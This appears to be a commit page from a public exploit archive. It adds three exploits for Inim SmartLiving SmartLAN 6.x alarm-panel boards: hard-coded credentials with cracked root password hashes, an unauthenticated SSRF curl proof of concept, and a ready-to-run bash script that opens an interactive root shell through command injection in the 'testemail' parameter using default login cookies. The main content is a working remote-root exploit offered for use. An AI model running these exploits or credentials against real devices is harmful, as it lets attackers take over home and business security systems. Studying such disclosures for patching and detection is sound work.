DB: 2019-12-11
3 changes to exploits/shellcodes Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
This commit is contained in:
parent
44b163c8d1
commit
09d5da74fb
4 changed files with 346 additions and 0 deletions
79
exploits/hardware/local/47763.txt
Normal file
79
exploits/hardware/local/47763.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials
|
||||
# Exploit Author: LiquidWorm
|
||||
# Date: 2019-12-09
|
||||
# Product web page: https://www.inim.biz
|
||||
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
# Advisory ID: ZSL-2019-5546
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
|
||||
|
||||
Inim Electronics Smartliving SmartLAN/G/SI <=6.x Hard-coded Credentials
|
||||
|
||||
|
||||
Vendor: INIM Electronics s.r.l.
|
||||
Product web page: https://www.inim.biz
|
||||
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
Affected version: <=6.x
|
||||
Affected models: SmartLiving 505
|
||||
SmartLiving 515
|
||||
SmartLiving 1050, SmartLiving 1050/G3
|
||||
SmartLiving 10100L, SmartLiving10100L/G3
|
||||
|
||||
Summary: SmartLiving anti-intrusion control panel and security system provides
|
||||
important features rarely found in residential, commercial or industrial application
|
||||
systems of its kind. This optimized-performance control panel provides first-rate
|
||||
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
|
||||
end-to-end voice transmission (voice-on-bus), IP connectivity.
|
||||
|
||||
SMARTLAN/SI:
|
||||
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
|
||||
networking capability and fast connectivity to the Internet. Therefore, it is possible
|
||||
to set up a remote connection and program or control the system via the SmartLeague
|
||||
software application. In effect, the SmartLAN/SI board grants the same level of access
|
||||
to the system as a local RS232 connection.
|
||||
|
||||
SMARTLAN/G:
|
||||
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
|
||||
advanced remote-access and communication functions. The SmartLAN/G board is capable of
|
||||
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
|
||||
an attachment and a text message. The attachment can be of any kind and is saved to an
|
||||
SD card. The message text can contain direct links to domains or IP addressable devices,
|
||||
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
|
||||
global access to their control panels via any Internet browser accessed through a PC,
|
||||
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
|
||||
distinguishing the means of connection and as a result provides an appropriate web-page
|
||||
for the tool in use. Smartphones can control the system in much the same way as a
|
||||
household keypad, from inside the house or from any part of the world.
|
||||
|
||||
Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
|
||||
These sets of credentials (Telnet, SSH, FTP) are never exposed to the end-user and cannot
|
||||
be changed through any normal operation of the smart home device. Attacker could exploit
|
||||
this vulnerability by logging in and gain system access.
|
||||
|
||||
Tested on: GNU/Linux 3.2.1 armv5tejl
|
||||
Boa/0.94.14rc21
|
||||
BusyBox v1.20.2
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5546
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php
|
||||
|
||||
|
||||
06.09.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
# cat /etc/passwd
|
||||
root:$1$$uqbusDeGY2YWqg.T2S1100:0:0:administrator:/:/bin/sh
|
||||
nobody:*:254:254:nobody:/var/empty:/bin/sh
|
||||
logout:gfr8cijmRSDck:498:506:logout:/:
|
||||
|
||||
# john --show /etc/passwd
|
||||
root:pass:0:0:administrator:/:/bin/sh
|
||||
logout:logout:498:506:logout:/:
|
||||
|
||||
2 password hashes cracked, 0 left
|
72
exploits/hardware/webapps/47764.txt
Normal file
72
exploits/hardware/webapps/47764.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery
|
||||
# Author: LiquidWorm
|
||||
# Date: 2019-12-09
|
||||
# Product web page: https://www.inim.biz
|
||||
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
# Version: 6.x
|
||||
# Advisory ID: ZSL-2019-5545
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
|
||||
|
||||
Inim Electronics Smartliving SmartLAN/G/SI <=6.x Unauthenticated SSRF
|
||||
|
||||
|
||||
Vendor: INIM Electronics s.r.l.
|
||||
Product web page: https://www.inim.biz
|
||||
Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
Affected version: <=6.x
|
||||
Affected models: SmartLiving 505
|
||||
SmartLiving 515
|
||||
SmartLiving 1050, SmartLiving 1050/G3
|
||||
SmartLiving 10100L, SmartLiving10100L/G3
|
||||
|
||||
Summary: SmartLiving anti-intrusion control panel and security system provides
|
||||
important features rarely found in residential, commercial or industrial application
|
||||
systems of its kind. This optimized-performance control panel provides first-rate
|
||||
features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
|
||||
end-to-end voice transmission (voice-on-bus), IP connectivity.
|
||||
|
||||
SMARTLAN/SI:
|
||||
The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
|
||||
networking capability and fast connectivity to the Internet. Therefore, it is possible
|
||||
to set up a remote connection and program or control the system via the SmartLeague
|
||||
software application. In effect, the SmartLAN/SI board grants the same level of access
|
||||
to the system as a local RS232 connection.
|
||||
|
||||
SMARTLAN/G:
|
||||
The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
|
||||
advanced remote-access and communication functions. The SmartLAN/G board is capable of
|
||||
sending event-related e-mails automatically. Each e-mail can be associated with a subject,
|
||||
an attachment and a text message. The attachment can be of any kind and is saved to an
|
||||
SD card. The message text can contain direct links to domains or IP addressable devices,
|
||||
such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
|
||||
global access to their control panels via any Internet browser accessed through a PC,
|
||||
PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
|
||||
distinguishing the means of connection and as a result provides an appropriate web-page
|
||||
for the tool in use. Smartphones can control the system in much the same way as a
|
||||
household keypad, from inside the house or from any part of the world.
|
||||
|
||||
Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the
|
||||
SmartLiving SmartLAN within the GetImage functionality. The application parses user
|
||||
supplied data in the GET parameter 'host' to construct an image request to the service
|
||||
through onvif.cgi. Since no validation is carried out on the parameter, an attacker
|
||||
can specify an external domain and force the application to make an HTTP request to
|
||||
an arbitrary destination host. This can be used by an external attacker for example
|
||||
to bypass firewalls and initiate a service and network enumeration on the internal
|
||||
network through the affected application.
|
||||
|
||||
Tested on: GNU/Linux 3.2.1 armv5tejl
|
||||
Boa/0.94.14rc21
|
||||
BusyBox v1.20.2
|
||||
|
||||
|
||||
Vulnerability discovered by Sipke Mellema
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5545
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
|
||||
|
||||
|
||||
PoC:
|
||||
|
||||
curl http://192.168.1.17/cgi-bin/onvif.cgi -X POST -d"mod=GetImage&host=http://127.0.0.1:23&par=2"
|
192
exploits/hardware/webapps/47765.txt
Normal file
192
exploits/hardware/webapps/47765.txt
Normal file
|
@ -0,0 +1,192 @@
|
|||
# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution
|
||||
# Author: LiquidWorm
|
||||
# Date: 2019-12-09
|
||||
# Product web page: https://www.inim.biz
|
||||
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
# Version: 6.x
|
||||
# Advisory ID: ZSL-2019-5545
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php
|
||||
|
||||
#!/bin/bash
|
||||
#
|
||||
#
|
||||
# Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution
|
||||
#
|
||||
#
|
||||
# Vendor: INIM Electronics s.r.l.
|
||||
# Product web page: https://www.inim.biz
|
||||
# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?
|
||||
# Affected version: <=6.x
|
||||
# Affected models: SmartLiving 505
|
||||
# SmartLiving 515
|
||||
# SmartLiving 1050, SmartLiving 1050/G3
|
||||
# SmartLiving 10100L, SmartLiving10100L/G3
|
||||
#
|
||||
# Summary: SmartLiving anti-intrusion control panel and security system provides
|
||||
# important features rarely found in residential, commercial or industrial application
|
||||
# systems of its kind. This optimized-performance control panel provides first-rate
|
||||
# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,
|
||||
# end-to-end voice transmission (voice-on-bus), IP connectivity.
|
||||
#
|
||||
# SMARTLAN/SI:
|
||||
# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point
|
||||
# networking capability and fast connectivity to the Internet. Therefore, it is possible
|
||||
# to set up a remote connection and program or control the system via the SmartLeague
|
||||
# software application. In effect, the SmartLAN/SI board grants the same level of access
|
||||
# to the system as a local RS232 connection.
|
||||
#
|
||||
# SMARTLAN/G:
|
||||
# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides
|
||||
# advanced remote-access and communication functions. The SmartLAN/G board is capable of
|
||||
# sending event-related e-mails automatically. Each e-mail can be associated with a subject,
|
||||
# an attachment and a text message. The attachment can be of any kind and is saved to an
|
||||
# SD card. The message text can contain direct links to domains or IP addressable devices,
|
||||
# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users
|
||||
# global access to their control panels via any Internet browser accessed through a PC,
|
||||
# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of
|
||||
# distinguishing the means of connection and as a result provides an appropriate web-page
|
||||
# for the tool in use. Smartphones can control the system in much the same way as a
|
||||
# household keypad, from inside the house or from any part of the world.
|
||||
#
|
||||
# Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.
|
||||
# The issue exist due to the 'par' POST parameter not being sanitized when called with
|
||||
# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit
|
||||
# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue
|
||||
# a command using the mailx service and its vulnerable string format parameter allowing
|
||||
# for OS command injection with root privileges. An attacker can remotely execute system
|
||||
# commands as the root user using default credentials and bypass access controls in place.
|
||||
#
|
||||
# ================= dissassembly of vuln function =================
|
||||
#
|
||||
#[0x0000c86c]> pd @ 0x000c86c
|
||||
#| ;-- pc:
|
||||
#| ;-- r15:
|
||||
#| 0x0000c86c ldr r1, str.testemail ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2
|
||||
#| 0x0000c870 bl sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)
|
||||
#| 0x0000c874 cmp r0, 0
|
||||
#| 0x0000c878 bne 0xc8b8
|
||||
#| 0x0000c87c cmp sl, 0
|
||||
#| 0x0000c880 beq 0xd148
|
||||
#| 0x0000c884 bl sym.set_no_cache
|
||||
#| 0x0000c888 add r5, sp, 0x20
|
||||
#| 0x0000c88c mov r0, r4
|
||||
#| 0x0000c890 ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"
|
||||
#| 0x0000c894 bl sym.imp.qcgires_setcontenttype
|
||||
#| 0x0000c898 mov r0, r5 ; char *s
|
||||
#| 0x0000c89c mov r1, 0xc8 ; 200 ; size_t
|
||||
#| 0x0000c8a0 ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con
|
||||
#| 0x0000c8a4 mov r3, r8 ; ...
|
||||
#| 0x0000c8a8 bl sym.imp.snprintf ; int snprintf(char *s,
|
||||
#| 0x0000c8ac mov r0, r5 ; const char * string
|
||||
#| 0x0000c8b0 bl sym.imp.system ; int system(const char *string)
|
||||
#| 0x0000c8b4 b 0xd134
|
||||
#|
|
||||
#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"
|
||||
#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")
|
||||
#| Process: 1351 root 0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig
|
||||
#|__
|
||||
# =================================================================
|
||||
#
|
||||
# -----------------------------------------------------------------
|
||||
#
|
||||
# root@kali:~# ./xpl.sh https://192.168.1.17
|
||||
#
|
||||
# Checking target: https://192.168.1.17
|
||||
# ACCESS GRANTED!
|
||||
#
|
||||
# root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd
|
||||
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
|
||||
# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux
|
||||
# 32
|
||||
# <!-- SLF6.07 10100 -->
|
||||
# <html><body><h2>
|
||||
# SmartLiving 6.07 10100
|
||||
# <br><br>SmartLAN/G v. 6.11
|
||||
# /www/cgi-bin
|
||||
# root@ssl> exit
|
||||
# root@kali:~/#
|
||||
#
|
||||
# -----------------------------------------------------------------
|
||||
#
|
||||
# Tested on: GNU/Linux 3.2.1 armv5tejl
|
||||
# Boa/0.94.14rc21
|
||||
# BusyBox v1.20.2
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2019-5544
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php
|
||||
#
|
||||
#
|
||||
# 06.09.2019
|
||||
#
|
||||
|
||||
URL=$1
|
||||
CGI="/cgi-bin/web.cgi"
|
||||
COOK="user=admin;pass=pass;code=9999"
|
||||
COOK1="user=admin;pass=pass;code=9998"
|
||||
COOK2="user=user;pass=pass;code=0001"
|
||||
PARAMS="mod=testemail&par=;"
|
||||
CHECK=${URL:4:1}
|
||||
|
||||
if [ "$#" -ne 1 ]; then
|
||||
echo -en "\e[34m"
|
||||
echo "==============================================="
|
||||
echo " SmartLiving SmartLAN 6.x Remote Root Exploit"
|
||||
echo -e "\t\tZSL-2019-5544"
|
||||
echo "==============================================="
|
||||
echo -en "\e[00m"
|
||||
echo -e "\nUsage: $0 http(s)://ip:port\n"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -ne "\nChecking target: $URL\n"
|
||||
|
||||
if [ "$CHECK" == "s" ]; then
|
||||
TEST=$(curl -sIk $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
|
||||
if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
|
||||
echo "HTTPS with error!"
|
||||
exit 0
|
||||
fi
|
||||
if curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
|
||||
then
|
||||
echo -e "ACCESS GRANTED!\n"
|
||||
else
|
||||
echo "Invalid credentials."
|
||||
exit 0
|
||||
fi
|
||||
while true; do
|
||||
R="$(tput sgr0)"
|
||||
S="$(tput setaf 2)"
|
||||
read -rp "${S}root@ssl>${R} " CMD
|
||||
if [[ "$CMD" == "exit" ]]; then
|
||||
exit 0
|
||||
fi
|
||||
curl -sik -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
|
||||
done
|
||||
else
|
||||
TEST=$(curl -sI $URL 2>/dev/null | head -1 | awk -F" " '{print $2}')
|
||||
if [[ "$?" = "7" ]] || [[ $TEST != "200" ]]; then
|
||||
echo "HTTP with error!"
|
||||
exit 0
|
||||
fi
|
||||
if curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"${PARAMS}id" | grep uid 1>/dev/null
|
||||
then
|
||||
echo -e "ACCESS GRANTED!\n"
|
||||
else
|
||||
echo "Invalid credentials."
|
||||
exit 0
|
||||
fi
|
||||
while true; do
|
||||
R="$(tput sgr0)"
|
||||
S="$(tput setaf 2)"
|
||||
read -rp "${S}root@http>${R} " CMD
|
||||
if [[ "$CMD" == "exit" ]]; then
|
||||
exit 0
|
||||
fi
|
||||
curl -si -X POST "$URL$CGI" -H "Cookie: $COOK" -d"$PARAMS${CMD}" | awk "/Connection: close/{j=1;next}j" | head -n -5
|
||||
done
|
||||
fi
|
|
@ -10834,6 +10834,7 @@ id,file,description,date,author,type,platform,port
|
|||
47754,exploits/windows/local/47754.py,"Microsoft Windows - 'WSReset' UAC Protection Bypass (Registry)",2019-09-02,valen,local,windows,
|
||||
47755,exploits/windows/local/47755.c,"Microsoft Windows 10 - 'WSReset' UAC Protection Bypass (propsys.dll)",2019-09-20,valen,local,windows,
|
||||
47759,exploits/windows/local/47759.py,"SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)",2019-12-09,"Kirill Nikolaev",local,windows,
|
||||
47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42072,3 +42073,5 @@ id,file,description,date,author,type,platform,port
|
|||
47760,exploits/hardware/webapps/47760.py,"Yachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution",2019-12-09,Hodorsec,webapps,hardware,
|
||||
47761,exploits/php/webapps/47761.py,"Alcatel-Lucent Omnivista 8770 - Remote Code Execution",2019-12-09,0x1911,webapps,php,
|
||||
47762,exploits/java/webapps/47762.txt,"Oracle Siebel Sales 8.1 - Persistent Cross-Site Scripting",2019-12-09,omurugur,webapps,java,
|
||||
47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
|
||||
47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue